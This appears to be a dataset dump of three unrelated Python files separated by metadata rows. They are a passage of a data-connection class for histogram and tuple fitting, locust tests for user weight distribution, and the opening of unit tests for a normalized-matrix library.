                center[xIndex] = cloud.valueX(entryNumber)
                center[yIndex] = cloud.valueY(entryNumber)
                centers.append(center)
                weights.append(None)
                errorsP.append(None)
                errorsM.append(None)
        elif isinstance(data1, IProfile2D) and (data2 == None) and (data3 == None) and (data4 == None):
            self._binned = True
            profile = data1
            xAxis = profile.xAxis()
            yAxis = profile.yAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    weight = profile.binHeight(xBinNumber, yBinNumber)
                    if weight == 0.0:
                        xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                        yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                    else:
                        xCenter = profile.binMeanX(xBinNumber, yBinNumber)
                        yCenter = profile.binMeanY(xBinNumber, yBinNumber)
                    centers.append([xCenter, yCenter])
                    weights.append(weight)
                    error = profile._binError2(xBinNumber, yBinNumber)
                    errorsP.append(error)
                    errorsM.append(error)
        elif isinstance(data1, IProfile2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
            self._binned = True
            profile = data1
            xIndex = data2
            yIndex = data3
            xAxis = profile.xAxis()
            yAxis = profile.yAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    weight = profile.binHeight(xBinNumber, yBinNumber)
                    if weight == 0.0:
                        xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                        yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                    else:
                        xCenter = profile.binMeanX(xBinNumber, yBinNumber)
                        yCenter = profile.binMeanY(xBinNumber, yBinNumber)
                    center = [None, None]
                    center[xIndex] = xCenter
                    center[yIndex] = yCenter
                    centers.append(center)
                    weights.append(weight)
                    error = profile._binError2(xBinNumber, yBinNumber)
                    errorsP.append(error)
                    errorsM.append(error)
        elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType):
            self._binned = True
            dataPointSet = data1
            xIndex = data2
            yIndex = data3
            valIndex = data4
            for offset in range(dataPointSet.size()):
                dataPoint = dataPointSet.point(offset)
                x = dataPoint.coordinate(xIndex)
                y = dataPoint.coordinate(yIndex)
                z = dataPoint.coordinate(valIndex)
                centers.append([x.value(), y.value()])
                weights.append(z.value())
                errorsP.append(z.errorPlus()**2)
                errorsM.append(z.errorMinus()**2)
        else:
            raise TypeError('Invalid arguments.')
        self._connection = [centers, weights, errorsP, errorsM]
        # two fitted dimensions -> two range sets
        self._range.append(IRangeSet())
        self._range.append(IRangeSet())

    def create3DConnection(self, data1, data2 = None, data3 = None, data4 = None, data5 = None):
        """Connect 3D data.

        Accepted argument patterns:
          - IHistogram3D                                       (binned)
          - IHistogram3D, xIndex, yIndex, zIndex               (binned, axes remapped)
          - ICloud3D                                           (unbinned)
          - ICloud3D, xIndex, yIndex, zIndex                   (unbinned, axes remapped)
          - IDataPointSet, xIndex, yIndex, zIndex, valIndex    (binned)
        Raises TypeError for anything else.
        """
        centers = []
        weights = []
        errorsP = []
        errorsM = []
        if isinstance(data1, IHistogram3D) and (data2 == None) and (data3 == None) and (data4 == None) and (data5 == None):
            self._binned = True
            histogram = data1
            xAxis = histogram.xAxis()
            yAxis = histogram.yAxis()
            zAxis = histogram.zAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    for zBinNumber in range(zAxis.bins()):
                        weight = histogram.binHeight(xBinNumber, yBinNumber, zBinNumber)
                        if weight == 0.0:
                            # empty bin: geometric centers on all three axes
                            xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                            yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                            zCenter = (zAxis.binLowerEdge(zBinNumber) + zAxis.binUpperEdge(zBinNumber)) / 2.0
                        else:
                            xCenter = histogram.binMeanX(xBinNumber, yBinNumber, zBinNumber)
                            yCenter = histogram.binMeanY(xBinNumber, yBinNumber, zBinNumber)
                            zCenter = histogram.binMeanZ(xBinNumber, yBinNumber, zBinNumber)
                        centers.append([xCenter, yCenter, zCenter])
                        weights.append(weight)
                        error = histogram._binError2(xBinNumber, yBinNumber, zBinNumber)
                        errorsP.append(error)
                        errorsM.append(error)
        elif isinstance(data1, IHistogram3D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and (data5 == None):
            self._binned = True
            histogram = data1
            xIndex = data2
            yIndex = data3
            zIndex = data4
            xAxis = histogram.xAxis()
            yAxis = histogram.yAxis()
            zAxis = histogram.zAxis()
            for xBinNumber in range(xAxis.bins()):
                for yBinNumber in range(yAxis.bins()):
                    for zBinNumber in range(zAxis.bins()):
                        weight = histogram.binHeight(xBinNumber, yBinNumber, zBinNumber)
                        if weight == 0.0:
                            xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
                            yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
                            zCenter = (zAxis.binLowerEdge(zBinNumber) + zAxis.binUpperEdge(zBinNumber)) / 2.0
                        else:
                            xCenter = histogram.binMeanX(xBinNumber, yBinNumber, zBinNumber)
                            yCenter = histogram.binMeanY(xBinNumber, yBinNumber, zBinNumber)
                            zCenter = histogram.binMeanZ(xBinNumber, yBinNumber, zBinNumber)
                        # place values at the caller-selected positions
                        center = [None, None, None]
                        center[xIndex] = xCenter
                        center[yIndex] = yCenter
                        center[zIndex] = zCenter
                        centers.append(center)
                        weights.append(weight)
                        error = histogram._binError2(xBinNumber, yBinNumber, zBinNumber)
                        errorsP.append(error)
                        errorsM.append(error)
        elif isinstance(data1, ICloud3D) and (data2 == None) and (data3 == None) and (data4 == None) and (data5 == None):
            self._binned = False
            cloud = data1
            for entryNumber in range(cloud.entries()):
                xCenter = cloud.valueX(entryNumber)
                yCenter = cloud.valueY(entryNumber)
                zCenter = cloud.valueZ(entryNumber)
                centers.append([xCenter, yCenter, zCenter])
                weights.append(None)
                errorsP.append(None)
                errorsM.append(None)
        elif isinstance(data1, ICloud3D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and (data5 == None):
            self._binned = False
            cloud = data1
            xIndex = data2
            yIndex = data3
            zIndex = data4
            for entryNumber in range(cloud.entries()):
                center = [None, None, None]
                center[xIndex] = cloud.valueX(entryNumber)
                center[yIndex] = cloud.valueY(entryNumber)
                center[zIndex] = cloud.valueZ(entryNumber)
                centers.append(center)
                weights.append(None)
                errorsP.append(None)
                errorsM.append(None)
        elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and isinstance(data5, types.IntType):
            self._binned = True
            dataPointSet = data1
            xIndex = data2
            yIndex = data3
            zIndex = data4
            valIndex = data5
            for offset in range(dataPointSet.size()):
                dataPoint = dataPointSet.point(offset)
                x = dataPoint.coordinate(xIndex)
                y = dataPoint.coordinate(yIndex)
                z = dataPoint.coordinate(zIndex)
                val = dataPoint.coordinate(valIndex)
                centers.append([x.value(), y.value(), z.value()])
                weights.append(val.value())
                errorsP.append(val.errorPlus()**2)
                errorsM.append(val.errorMinus()**2)
        else:
            raise TypeError('Invalid arguments.')
        self._connection = [centers, weights, errorsP, errorsM]
        # three fitted dimensions -> three range sets
        self._range.append(IRangeSet())
        self._range.append(IRangeSet())
        self._range.append(IRangeSet())

    def createConnection(self, data1 = None, data2 = None, data3 = None):
        """Connect N-dimensional data.

        Accepted argument patterns:
          - ITuple, iterable of column names or IEvaluators    (unbinned)
          - IDataPointSet, iterable of coordinate indices, valIndex  (binned;
            an empty indices list uses the point offset as the center)
        Raises TypeError for anything else.

        NOTE(review): an empty colData iterable would raise IndexError on
        colData[0] before any TypeError -- confirm callers never pass [].
        """
        centers = []
        weights = []
        errorsP = []
        errorsM = []
        if isinstance(data1, ITuple) and hasattr(data2, '__iter__') and (data3 == None):
            self._binned = False
            iTuple = data1
            colData = data2
            length = iTuple.rows()
            if length == -1:
                raise TypeError('This ITuple has no row.')
            iTuple.start()
            if isinstance(colData[0], types.StringTypes):
                # columns referenced by name: resolve index and a typed getter
                columnIndices = []
                evaluatorCs = []
                for columnName in colData:
                    columnIndex = iTuple.findColumn(columnName)
                    columnIndices.append(columnIndex)
                    columnType = iTuple.columnType(columnIndex)
                    if columnType == PTypes.Double:
                        evaluatorCs.append(iTuple.getDouble)
                    elif columnType == PTypes.Float:
                        evaluatorCs.append(iTuple.getFloat)
                    elif columnType == PTypes.Int:
                        evaluatorCs.append(iTuple.getInt)
                    elif columnType == PTypes.Short:
                        evaluatorCs.append(iTuple.getShort)
                    elif columnType == PTypes.Long:
                        evaluatorCs.append(iTuple.getLong)
                    elif columnType == PTypes.Char:
                        evaluatorCs.append(iTuple.getChar)
                    elif columnType == PTypes.Byte:
                        evaluatorCs.append(iTuple.getByte)
                    elif columnType == PTypes.Boolean:
                        evaluatorCs.append(iTuple.getBoolean)
                    elif columnType == PTypes.String:
                        evaluatorCs.append(iTuple.getString)
                    elif columnType == PTypes.Object:
                        evaluatorCs.append(iTuple.getObject)
                    elif columnType == PTypes.Tuple:
                        evaluatorCs.append(iTuple.getTuple)
                    else:
                        raise TypeError('Illegal column type %s' % columnType)
                while iTuple.next():
                    center = []
                    for i, columnIndex in enumerate(columnIndices):
                        center.append(evaluatorCs[i](columnIndex))
                    centers.append(center)
                    weights.append(None)
                    errorsP.append(None)
                    errorsM.append(None)
            elif isinstance(colData[0], IEvaluator):
                # columns computed by evaluators bound to the tuple
                evaluatorCs = []
                for evaluator in colData:
                    evaluator.initialize(iTuple)
                    evaluatorCs.append(evaluator.evaluateDouble)
                while iTuple.next():
                    center = []
                    for evaluatorC in evaluatorCs:
                        center.append(evaluatorC())
                    centers.append(center)
                    weights.append(None)
                    errorsP.append(None)
                    errorsM.append(None)
            else:
                raise TypeError('Illegal list data type.')
            self._connection = [centers, weights, errorsP, errorsM]
            for i in range(len(colData)):
                self._range.append(IRangeSet())
        elif isinstance(data1, IDataPointSet) and hasattr(data2, '__iter__') and isinstance(data3, types.IntType):
            self._binned = True
            dataPointSet = data1
            indices = data2
            valIndex = data3
            for offset in range(dataPointSet.size()):
                dataPoint = dataPointSet.point(offset)
                val = dataPoint.coordinate(valIndex)
                center = []
                if indices == []:
                    # no coordinate indices: use the point offset as center
                    center.append(offset)
                else:
                    for i in indices:
                        center.append(dataPoint.coordinate(i).value())
                centers.append(center)
                weights.append(val.value())
                errorsP.append(val.errorPlus()**2)
                errorsM.append(val.errorMinus()**2)
            self._connection = [centers, weights, errorsP, errorsM]
            for i in range(len(indices)):
                self._range.append(IRangeSet())
        else:
            raise TypeError('Invalid arguments.')

    def reset(self):
        """Clear the connection, ranges, and description back to the initial state."""
        self._connection = []
        self._range = []
        self._binned = None
        self._dataDescription = ''

    def dimension(self):
        """Number of connected dimensions (one per IRangeSet)."""
        return len(self._range)

    def dataDescription(self):
        """Free-form description string of the connected data."""
        return self._dataDescription

    def range(self, i):
        """Return the IRangeSet for dimension i; TypeError if not connected."""
        try:
            return self._range[i]
        except IndexError:
            raise TypeError('The Range[%d] does not exist.' % i)
| 35.887931
| 188
| 0.69325
| 1,870
| 16,652
| 6.132086
| 0.093583
| 0.016482
| 0.023546
| 0.021976
| 0.80954
| 0.755211
| 0.746926
| 0.734368
| 0.700706
| 0.665736
| 0
| 0.016193
| 0.187845
| 16,652
| 463
| 189
| 35.965443
| 0.831707
| 0
| 0
| 0.705336
| 0
| 0
| 0.01111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020882
| false
| 0
| 0.037123
| 0.00464
| 0.067285
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5aaca73fd77168cc61f1abe7535ffbe52c651777
| 8,001
|
py
|
Python
|
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
import time
import unittest
from locust import User
from locust.distribution import weight_users
class TestDistribution(unittest.TestCase):
def test_distribution_no_user_classes(self):
user_classes_count = weight_users(user_classes=[], user_count=0)
self.assertDictEqual(user_classes_count, {})
user_classes_count = weight_users(user_classes=[], user_count=1)
self.assertDictEqual(user_classes_count, {})
def test_distribution_equal_weights_and_fewer_amount_than_user_classes(self):
class User1(User):
weight = 1
class User2(User):
weight = 1
class User3(User):
weight = 1
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=0)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=1)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=2)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 0})
def test_distribution_equal_weights(self):
class User1(User):
weight = 1
class User2(User):
weight = 1
class User3(User):
weight = 1
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=3)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=4)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=5)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=6)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 2, "User3": 2})
def test_distribution_unequal_and_unique_weights_and_fewer_amount_than_user_classes(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 3
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=0)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=1)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=2)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 1, "User3": 1})
def test_distribution_unequal_and_unique_weights(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 3
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=3)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=4)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=5)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=6)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 3})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=10)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 3, "User3": 5})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=11)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 4, "User3": 5})
def test_distribution_unequal_and_non_unique_weights_and_fewer_amount_than_user_classes(self):
    """With duplicate weights (1/2/2) and fewer users than classes, ties
    between equally-weighted classes are resolved deterministically."""

    class User1(User):
        weight = 1

    class User2(User):
        weight = 2

    class User3(User):
        weight = 2

    cases = [
        (0, {"User1": 0, "User2": 0, "User3": 0}),
        (1, {"User1": 0, "User2": 1, "User3": 0}),
        (2, {"User1": 0, "User2": 1, "User3": 1}),
    ]
    for count, expected in cases:
        user_classes_count = weight_users(
            user_classes=[User1, User2, User3], user_count=count
        )
        self.assertDictEqual(user_classes_count, expected)
def test_distribution_unequal_and_non_unique_weights(self):
    """Users are spread proportionally to the weights 1/2/2, with ties
    between the two weight-2 classes resolved deterministically."""

    class User1(User):
        weight = 1

    class User2(User):
        weight = 2

    class User3(User):
        weight = 2

    cases = [
        (3, {"User1": 1, "User2": 1, "User3": 1}),
        (4, {"User1": 1, "User2": 1, "User3": 2}),
        (5, {"User1": 1, "User2": 2, "User3": 2}),
        (6, {"User1": 1, "User2": 3, "User3": 2}),
        (10, {"User1": 2, "User2": 4, "User3": 4}),
        (11, {"User1": 2, "User2": 5, "User3": 4}),
    ]
    for count, expected in cases:
        user_classes_count = weight_users(
            user_classes=[User1, User2, User3], user_count=count
        )
        self.assertDictEqual(user_classes_count, expected)
def test_distribution_large_number_of_users(self):
    """Distribution stays exact (counts sum to user_count) and fast
    (under 100 ms per call) even for astronomically large user counts."""

    class User1(User):
        weight = 5

    class User2(User):
        weight = 55

    class User3(User):
        weight = 37

    class User4(User):
        weight = 2

    class User5(User):
        weight = 97

    class User6(User):
        weight = 41

    class User7(User):
        weight = 33

    class User8(User):
        weight = 19

    class User9(User):
        weight = 19

    class User10(User):
        weight = 34

    class User11(User):
        weight = 78

    class User12(User):
        weight = 76

    class User13(User):
        weight = 28

    class User14(User):
        weight = 62

    class User15(User):
        weight = 69

    all_user_classes = [
        User1, User2, User3, User4, User5,
        User6, User7, User8, User9, User10,
        User11, User12, User13, User14, User15,
    ]
    base_count = 1044523783783
    for user_count in range(base_count, base_count + 1000):
        started = time.perf_counter()
        user_classes_count = weight_users(
            user_classes=all_user_classes,
            user_count=user_count,
        )
        elapsed_ms = 1e3 * (time.perf_counter() - started)
        # All users must be accounted for, and each call must be fast.
        self.assertEqual(sum(user_classes_count.values()), user_count)
        self.assertLessEqual(elapsed_ms, 100)
| 36.040541
| 98
| 0.611549
| 951
| 8,001
| 4.872766
| 0.087277
| 0.208891
| 0.193353
| 0.132931
| 0.830168
| 0.814631
| 0.814631
| 0.808373
| 0.783556
| 0.763271
| 0
| 0.068319
| 0.273716
| 8,001
| 221
| 99
| 36.20362
| 0.729134
| 0
| 0
| 0.518987
| 0
| 0
| 0.046869
| 0
| 0
| 0
| 0
| 0
| 0.183544
| 1
| 0.050633
| false
| 0
| 0.025316
| 0
| 0.291139
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ab5cd0abd96d341534b4e7e4537ee747176cd97
| 16,860
|
py
|
Python
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 12
|
2018-10-04T08:27:33.000Z
|
2022-01-11T15:41:29.000Z
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 3
|
2020-09-22T16:18:51.000Z
|
2021-12-28T19:01:00.000Z
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 4
|
2019-12-13T17:52:19.000Z
|
2021-12-17T12:43:44.000Z
|
# Copyright 2018 Side Li and Arun Kumar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import scipy.sparse as sp
import sklearn.preprocessing as preprocess
from numpy.testing import (
run_module_suite, assert_equal, assert_almost_equal
)
import normalized_matrix as nm
import utils
class TestNormalizedMatrix(object):
    """Tests for nm.NormalizedMatrix, a factorized ("normalized") matrix.

    Fixtures: ``s`` is the entity table, ``r`` holds the attribute
    table(s), and ``k`` holds the key/foreign-key index arrays mapping
    each entity row to a row of the corresponding attribute table.
    ``m`` is the fully materialized equivalent (s joined with r[0][k[0]])
    used as the ground truth throughout.
    """

    # Entity table: 5 rows x 2 columns.
    s = np.matrix([[1.0, 2.0], [4.0, 3.0], [5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
    # Foreign-key indexes: entity row i joins with attribute row k[0][i].
    k = [np.array([0, 1, 1, 0, 1])]
    # Attribute table(s): 2 rows x 2 columns.
    r = [np.matrix([[1.1, 2.2], [3.3, 4.4]])]
    # Materialized join of s with r[0][k[0]] — the dense ground truth.
    m = np.matrix([[1.0, 2.0, 1.1, 2.2],
                   [4.0, 3.0, 3.3, 4.4],
                   [5.0, 6.0, 3.3, 4.4],
                   [8.0, 7.0, 1.1, 2.2],
                   [9.0, 1.0, 3.3, 4.4]])
    n_matrix = nm.NormalizedMatrix(s, r, k)

    def test_add(self):
        """Scalar/row-vector addition applies element-wise to both the
        entity and attribute tables without touching the key arrays."""
        n_matrix = self.n_matrix
        # n_matrix + scalar
        local_matrix = n_matrix + 1
        assert_equal(local_matrix.ent_table, self.s + 1)
        assert_equal(local_matrix.att_table[0], self.r[0] + 1)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # n_matrix + row vector (split column-wise across s and r).
        local_matrix = n_matrix + np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s + np.matrix([1.0, 2.0]))
        assert_equal(local_matrix.att_table[0],
                     self.r[0] + np.matrix([1.1, 2.2]))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # Reflected (scalar + n_matrix).
        local_matrix = 1 + n_matrix
        assert_equal(local_matrix.ent_table[0], 1 + self.s[0])
        assert_equal(local_matrix.att_table[0], 1 + self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # Reflected (row vector + n_matrix).
        local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) + n_matrix
        assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) + self.s)
        assert_equal(local_matrix.att_table[0], np.matrix(
            [1.1, 2.2]) + self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # In-place scalar addition.
        local_matrix = n_matrix + 1
        local_matrix += 1
        assert_equal(local_matrix.ent_table[0], 2 + self.s[0])
        assert_equal(local_matrix.att_table[0], 2 + self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # In-place row-vector addition.
        local_matrix = n_matrix + np.matrix([1.0, 2.0, 1.1, 2.2])
        local_matrix += np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s +
                     np.matrix([1.0, 2.0]) * 2)
        assert_equal(local_matrix.att_table[0],
                     self.r[0] + np.matrix([1.1, 2.2]) * 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        # numpy ufunc dispatch (np.add), both operand orders.
        local_matrix = np.add(n_matrix, 1)
        assert_equal(local_matrix.ent_table, self.s + 1)
        assert_equal(local_matrix.att_table[0], self.r[0] + 1)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.add(1, n_matrix)
        assert_equal(local_matrix.ent_table, self.s + 1)
        assert_equal(local_matrix.att_table[0], self.r[0] + 1)
        assert_equal(local_matrix.kfkds[0], self.k[0])

    def test_sub(self):
        """Subtraction mirrors test_add, including reflected and
        in-place variants and np.subtract dispatch."""
        n_matrix = self.n_matrix
        local_matrix = n_matrix - 1
        assert_equal(local_matrix.ent_table[0], self.s[0] - 1)
        assert_equal(local_matrix.att_table[0], self.r[0] - 1)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix - np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s - np.matrix([1.0, 2.0]))
        assert_equal(local_matrix.att_table[0],
                     self.r[0] - np.matrix([1.1, 2.2]))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = 1 - n_matrix
        assert_equal(local_matrix.ent_table[0], 1 - self.s[0])
        assert_equal(local_matrix.att_table[0], 1 - self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) - n_matrix
        assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) - self.s)
        assert_equal(local_matrix.att_table[0], np.matrix(
            [1.1, 2.2]) - self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix - 1
        local_matrix -= 1
        assert_equal(local_matrix.ent_table[0], self.s[0] - 2)
        assert_equal(local_matrix.att_table[0], self.r[0] - 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix - np.matrix([1.0, 2.0, 1.1, 2.2])
        local_matrix -= np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s -
                     np.matrix([1.0, 2.0]) * 2)
        assert_equal(local_matrix.att_table[0],
                     self.r[0] - np.matrix([1.1, 2.2]) * 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.subtract(n_matrix, 1)
        assert_equal(local_matrix.ent_table, self.s - 1)
        assert_equal(local_matrix.att_table[0], self.r[0] - 1)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.subtract(1, n_matrix)
        assert_equal(local_matrix.ent_table, 1 - self.s)
        assert_equal(local_matrix.att_table[0], 1 - self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])

    def test_mul(self):
        """Element-wise scalar multiplication, including reflected,
        in-place, and np.multiply dispatch."""
        n_matrix = self.n_matrix
        local_matrix = n_matrix * 2
        assert_equal(local_matrix.ent_table[0], self.s[0] * 2)
        assert_equal(local_matrix.att_table[0], self.r[0] * 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = 2 * n_matrix
        assert_equal(local_matrix.ent_table[0], 2 * self.s[0])
        assert_equal(local_matrix.att_table[0], 2 * self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = 2 * n_matrix
        local_matrix *= 2
        assert_equal(local_matrix.ent_table[0], 4 * self.s[0])
        assert_equal(local_matrix.att_table[0], 4 * self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.multiply(n_matrix, 2)
        assert_equal(local_matrix.ent_table, self.s * 2)
        assert_equal(local_matrix.att_table[0], self.r[0] * 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.multiply(2, n_matrix)
        assert_equal(local_matrix.ent_table, 2 * self.s)
        assert_equal(local_matrix.att_table[0], 2 * self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])

    def test_div(self):
        """Element-wise division, including reflected, in-place, and
        np.divide dispatch; repeated row-vector division compounds as a
        square (np.power(..., 2))."""
        n_matrix = self.n_matrix
        local_matrix = n_matrix / 2
        assert_equal(local_matrix.ent_table, self.s / 2)
        assert_equal(local_matrix.att_table[0], self.r[0] / 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix / np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s / np.matrix([1.0, 2.0]))
        assert_equal(local_matrix.att_table[0],
                     self.r[0] / np.matrix([1.1, 2.2]))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = 2 / n_matrix
        assert_equal(local_matrix.ent_table, 2 / self.s)
        assert_equal(local_matrix.att_table[0], 2 / self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) / n_matrix
        assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) / self.s)
        assert_equal(local_matrix.att_table[0], np.matrix(
            [1.1, 2.2]) / self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix / 2
        local_matrix /= 2
        assert_equal(local_matrix.ent_table, self.s / 4)
        assert_equal(local_matrix.att_table[0], self.r[0] / 4)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = n_matrix / np.matrix([1.0, 2.0, 1.1, 2.2])
        local_matrix /= np.matrix([1.0, 2.0, 1.1, 2.2])
        assert_equal(local_matrix.ent_table, self.s /
                     np.power(np.matrix([1.0, 2.0]), 2))
        assert_equal(
            local_matrix.att_table[0], self.r[0] / np.power(np.matrix([1.1, 2.2]), 2))
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.divide(n_matrix, 2)
        assert_equal(local_matrix.ent_table, self.s / 2)
        assert_equal(local_matrix.att_table[0], self.r[0] / 2)
        assert_equal(local_matrix.kfkds[0], self.k[0])
        local_matrix = np.divide(2, n_matrix)
        assert_equal(local_matrix.ent_table, 2 / self.s)
        assert_equal(local_matrix.att_table[0], 2 / self.r[0])
        assert_equal(local_matrix.kfkds[0], self.k[0])

    def test_pow(self):
        """Element-wise power via the ** operator and np.power, in both
